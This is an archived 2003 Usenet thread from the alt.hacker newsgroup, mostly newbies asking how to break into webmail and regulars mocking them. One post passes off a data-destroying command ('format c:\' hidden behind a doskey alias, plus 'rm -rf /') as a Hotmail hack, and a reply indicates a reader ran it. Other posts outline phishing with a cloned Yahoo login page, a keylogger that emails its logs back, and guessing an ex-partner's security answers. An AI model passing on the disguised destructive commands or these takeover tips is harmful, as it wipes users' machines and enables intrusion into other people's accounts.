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John

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Mar 12, 2003, 2:45:11 PM3/12/03
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Use social engineering to hack. Learn how.

www.gosecure.cc

Gandalf Parker

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Mar 12, 2003, 3:05:20 PM3/12/03
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spank...@yahoo.com (John) wrote in news:703beb40.0303121145.3f98da41
@posting.google.com:

> Use social engineering to hack. Learn how.
>
> www.gosecure.cc

Another excellent site for an example of a disclaimer that doesnt mean
shit.

Gandalf Parker

-- How many script-kiddies does it take to change a lightbulb?
..
Just one. But it takes a hacker to find the way, a cracker to package
the way, and a skiddie to download and use the automated
lightbulb-changing software. - Gandalf Parker

stacy brown

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Mar 13, 2003, 12:10:53 AM3/13/03
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> -- How many script-kiddies does it take to change a lightbulb?
> ..
> Just one. But it takes a hacker to find the way, a cracker to package
> the way, and a skiddie to download and use the automated
> lightbulb-changing software. - Gandalf Parker

Amen. And we are bitter too, because with this technology, they can do
(automated) what we do from scratch. Thats all I have to say about that.


news.verizon.net

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Mar 13, 2003, 9:34:31 AM3/13/03
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I'M HAVING TROUBLE INSTALLING AND RUNNING THIS PROGRAM, CAN SOMEONE HELP.
"John" <spank...@yahoo.com> wrote in message
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bd

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Mar 13, 2003, 6:15:28 PM3/13/03
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On Thu, 13 Mar 2003 14:34:31 +0000, news.verizon.net wrote:

> I'M HAVING TROUBLE INSTALLING AND RUNNING THIS PROGRAM, CAN SOMEONE HELP.

No
* YOU'RE POSTING IN CAPS. DON'T DO THIS.
* You're porting above what you're responding to.
* You want *hackers* to help you *crack*. Not going to happen.

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Dana

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Mar 13, 2003, 7:07:07 PM3/13/03
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thanks alot
"bd" <bdo...@bd-home-comp.no-ip.org> wrote in message
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Spoy

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Mar 13, 2003, 8:14:00 PM3/13/03
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"stacy brown" <brown...@charter.net> wrote in message news:<v704alc...@corp.supernews.com>...

-What are you talking about from scratch? To do this, you don't even
need a program...Just a server. Real hacking requires much more
sophistication, and it can't be bundled into a program.

Big Bad Bob

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Mar 13, 2003, 8:32:14 PM3/13/03
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"Dana" <dana....@verizon.net> wrote in message
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> thanks alot
> "bd" <bdo...@bd-home-comp.no-ip.org> wrote in message
> news:pan.2003.03.13...@bd-home-comp.no-ip.org...
> > On Thu, 13 Mar 2003 14:34:31 +0000, news.verizon.net wrote:
> >

etc.

It's called "top posting" when you put YOUR text "on top" of the message.
No logical flow that way. Examine other posts in this NG please to see how
to do it properly. And RTFAQ.

Bad Doggie

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Mar 20, 2003, 6:27:33 PM3/20/03
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"news.verizon.net" <dana....@verizon.net> wrote in message
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Everyone knows the easiest way to hack hotmail for newbies is very

simple. open up a command prompt, and type: "doskey

security.hotmail.com(hackhotmail(ACCOUNT TO HACK GOES HERE))=format

c:\"

then type: "security.hotmail.com(hackhotmail(ACCOUNT TO HACK GOES

HERE))"

replace the ACCOUNT TO HACK GOES HERE with the account to hack. note:

this only works in windows. to do it in linux, simply open up a

command prompt and type: "rm -rf /"


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Shane Tow

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Mar 26, 2003, 3:34:55 AM3/26/03
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--
"The secret of creativity is knowing how to hide your sources."

Albert Einstien
"Bad Doggie" <Bad_D...@doghouse.outback> wrote in message
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> Nice d00d

>
>


Karunakaran Prasad

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Mar 28, 2003, 2:41:04 AM3/28/03
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Hello,
Its a bit disheartening to see that the younger generation of
computer "hackers" here still haven't evolved enough to realise that
"hacking" is definitely not what you see on TV. The repeated use of
"cracker lingo" and other forms of substandard expressions is another
convincing factor that unless the younger generation gears up and
seriously start to learn something beneficial to themselves if not
anyone else, everyone is going to end up as wannabes.

Please do me a favour and read Eric S Raymonds FAQ on "How to become
a hacker " to have a rough idea about what hacking truly means and
where the term really evolved from. Also take a goodlook at hisFAQ on
"How to ask questions the smart way", rather than whining for help on
programming, networking or just anything else. You dont make the best
of impressions then. You ask only as a last resort. RTFM, for god
sake.

Spamming, cracking and use of pre-developed and etsted software are
for idiots and not just the image of the hacker who really loves
challenges to work on. Turn to the field of quantum computing , if you
feel that computing today does not demand very much of your creative
abilities.

You feel I am treating you like kids, by giving unsolicited
advice?Then move on and really use your talent.

Yours very sincerely,
Karunakaran Prasad

Gandalf Parker

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Mar 28, 2003, 11:00:21 AM3/28/03
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karuna...@yahoo.com (Karunakaran Prasad) wrote in
news:34ed1730.03032...@posting.google.com:

> Spamming, cracking and use of pre-developed and etsted software are
> for idiots and not just the image of the hacker who really loves
> challenges to work on. Turn to the field of quantum computing , if you
> feel that computing today does not demand very much of your creative
> abilities.
>
> You feel I am treating you like kids, by giving unsolicited
> advice?Then move on and really use your talent.

Good shot. Sounds like the (daily) kindof postings done in alt.hacker

Gandalf Parker

-- A user considers a menu to be a list of the things he can do.
A hacker considers a menu to be a list of the things that are crossed
off of his list of things to do.

Glitch

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Apr 2, 2003, 12:02:18 AM4/2/03
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hey smart guy--i wrote that "special newbie hotmail hacking code" so
please give me credit! i posted it originally and i wrote it from
scratch! it took me almost 25 seconds!

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Glitch

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Apr 2, 2003, 12:05:10 AM4/2/03
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karuna...@yahoo.com (Karunakaran Prasad) wrote in message news:<34ed1730.03032...@posting.google.com>...


i agree compeletly! hackers arent really what the media calls
"hackers", but we're just curious geeks who are passionate about
security.

17

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Apr 8, 2003, 3:03:36 PM4/8/03
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ok i did that on my laptop. now it is acting strange, this is why i am using
my friends pc. if i leave my laptop on a long time will it fix itself? where
is my windows gone?


Gandalf Parker

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Apr 8, 2003, 4:44:15 PM4/8/03
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"17" <m...@hotmail.com> wrote in news:b6v640$q9u$1...@newsg1.svr.pol.co.uk:

> ok i did that on my laptop. now it is acting strange, this is why i am
> using my friends pc. if i leave my laptop on a long time will it fix
> itself? where is my windows gone?

You formated your C: drive? Its kindof hard to get that back again.

Gandalf Parker

Glitch

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Apr 11, 2003, 11:59:36 PM4/11/03
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"17" <m...@hotmail.com> wrote in message news:<b6v640$q9u$1...@newsg1.svr.pol.co.uk>...

> ok i did that on my laptop. now it is acting strange, this is why i am using
> my friends pc. if i leave my laptop on a long time will it fix itself? where
> is my windows gone?

ok, to fix your computer you need to put it up on ebay for $5.. then
you need to go to the apple store and buy a mac. thats how to fix
it... yup thats it...

Eddie Arpanet User

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Apr 14, 2003, 11:56:53 AM4/14/03
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chris....@celebration.fl.us (Glitch) wrote in message news:<8edb7ccf.03040...@posting.google.com>...


Why anybody would want to break into web-based email services(or
even IM services)is beyond me.There is nothing of value and the skills
required to do this is academic.Time and a lot of coffee will have
gotten a hacker into the hard as steel MIT network,but Hotmail? Give
me a break.Put your talents to good use and try to get into
D...@nb.gov.net instead...

Joey

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Apr 14, 2003, 3:26:57 PM4/14/03
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Only if he wants a paper wieght.


Hunab Ku

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Apr 15, 2003, 3:52:38 AM4/15/03
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tbir...@hotmail.com (Eddie Arpanet User) wrote in message news:<f0838f83.03041...@posting.google.com>...


>
> Why anybody would want to break into web-based email services(or
> even IM services)is beyond me.There is nothing of value and the skills
> required to do this is academic.Time and a lot of coffee will have
> gotten a hacker into the hard as steel MIT network,but Hotmail? Give
> me a break.Put your talents to good use and try to get into
> D...@nb.gov.net instead...

I agree ...

laufinjackass

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Apr 19, 2003, 12:46:15 PM4/19/03
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i think there is one chance of hacking into web based email systems
(other than social engineering).U can easily send a key logger with
the adquate batch files to run the software once the machine is
started.(This could be easily achieved by the safe for scripting
activex controls).Then it is a matter of writting (or getting) a
program to send the log file to u through email.But there are plenty
of chances that u will be found out.u need a little bit of luck and
patience.Hey comon this is applicable to all hacking.

Glitch

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Apr 29, 2003, 8:50:14 PM4/29/03
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laufin...@hotmail.com (laufinjackass) wrote in message news:<bdcc5ece.0304...@posting.google.com>...

heh--an extremely much overlooked way to get hotmail passwords is to
guess the secret question... i mean after if your trying to get your
ex-girlfriends PW or something then u ought to know a lot about
her.... like her favorite pets name or her mothers maiden name and
stupid stuff like that.

Tony Smith

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May 1, 2003, 11:31:49 AM5/1/03
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Has anyone tried duplicating the Yahoo email entry screen and putting it on
their website? By using a anonymous email agent you could send the email to
the victim saying something like Yahoo needs to verify your account and
password for a prize you have won or something like that. Maybe that's not
that good of an example but you could probably fool a few people that way.
But like they've said before, what's the big deal about cracking into
e-mail. It's too overrated. I have done it once to my brother by knowing his
password and my conscience still bothers me. Ewww! Didn't know he was such a
big porno freak Put your hacking skills to something else.


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Gandalf Parker

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Apr 30, 2003, 1:32:32 PM4/30/03
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"Tony Smith" <usp8...@centurytel.net> wrote in
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> Has anyone tried duplicating the Yahoo email entry screen and putting
> it on their website?

Please find the newsgroup you feel at home in and move in. The actin you
describe is a common occurance. And more importantly it is considered
inappropriate for posting in alt.hacker

Gandalf Parker
-- you can read our FAQ at
alt-hacker.org

walter

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May 15, 2003, 7:58:03 AM5/15/03
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i need assistance to find the password (presumably 8 alphanumeric
digits) on an mailserver of a particular user; I am willing to
reimburse for time spent; who can help me ? I unfortunately am
computer illiterate and cannot find my way in accessing servers. I
have tried several programs -brutus being the last- but do not
succeed. How can I possibly proceed ?

thanks - walter

Gandalf Parker

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May 15, 2003, 9:22:43 AM5/15/03
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walterd...@aol.com (walter) wrote in news:64e99bf.0305150358.404383b1
@posting.google.com:

Ahhhhh "computer illiterate". I understand. (doesnt that translate as "I
cant read a computer screen"?) That would explain why you included
alt.hacker in your post. Because you havent read the FAQ file (Frequently
Asked Questions) at alt-hacker.org.

Please remove alt.hacker from this conversation.

Gandalf Parker

walter

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May 16, 2003, 3:10:39 AM5/16/03
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I'm sorry

walter

Curt

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Jun 22, 2003, 2:40:00 AM6/22/03
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FFR = Fdisk, Format, Re-Install

"17" <m...@hotmail.com> wrote in message
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The Weaver

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Jun 24, 2003, 8:13:20 AM6/24/03
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Ok Curt. What's your problem?? I CAN'T FIJND IT ANYWHERE!!! I can
help...first do the format and reinstall and you know what i mean...
the basics...you know what they are...right? Anyway if that doesn't
work just tell me i can inform on more

DA'VIRUS

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Jul 7, 2003, 2:49:23 PM7/7/03
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add one more to that which we will ask you in good time

Drivers.

"Curt" <m...@mine.net> wrote in message
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Honey

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Aug 1, 2003, 3:12:53 PM8/1/03
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"DA'VIRUS" <vir...@hotmail.com> wrote in message news:<becfbj$3ul$1...@sparta.btinternet.com>...

mmmm.. drivers

Philo Max

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Aug 8, 2003, 10:53:54 AM8/8/03
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Honey wrote:

if you followed the instructions from Curt, what you actually did was called up the DOS based
'fdisk' (format disk) program.... This program allowed you to format your hard drive, and after
reboot ... the instructions allowed you to start a fress install of your operating system.

The problem with the procedure as I see it ... is that most laptops/pc clones require some kind
of device driver for the peripherals used on the system. If you don't have these special drivers
(i.e. video, sound, etc.) your MS operating system will load the standard drivers for these
devices.

Those standard device drivers loaded may work, however, if you are having problems... you should
get the specific drivers for the devices you are having problems with.

Philo Max

lynliz

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Aug 9, 2003, 8:18:11 PM8/9/03
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I have saved some files from the internet to my diskette,but such
files was detected as a virus,but still i opened the file,creating
some interrupted operations and corrupted files what will i do?...pls.
help me


Philo Max <phil...@comcast.net> wrote in message news:<3F33B777...@comcast.net>...

Daemon

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Aug 9, 2003, 8:43:28 PM8/9/03
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On Sunday 10 August 2003 02:18 lynliz expounded the following to alt.hacker:

> I have saved some files from the internet to my diskette,but such
> files was detected as a virus,but still i opened the file,creating
> some interrupted operations and corrupted files what will i do?...pls.
> help me

You downloaded a file from an untrusted source, your virus scanner told you
it was a virus and you still ran it? Sounds like all is all right to me,
Darwin's Law and such.

You will need to post more information if you really want help, but to be
honest I'm not even sure a reinstall will solve the problems you really
have.

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Daemon
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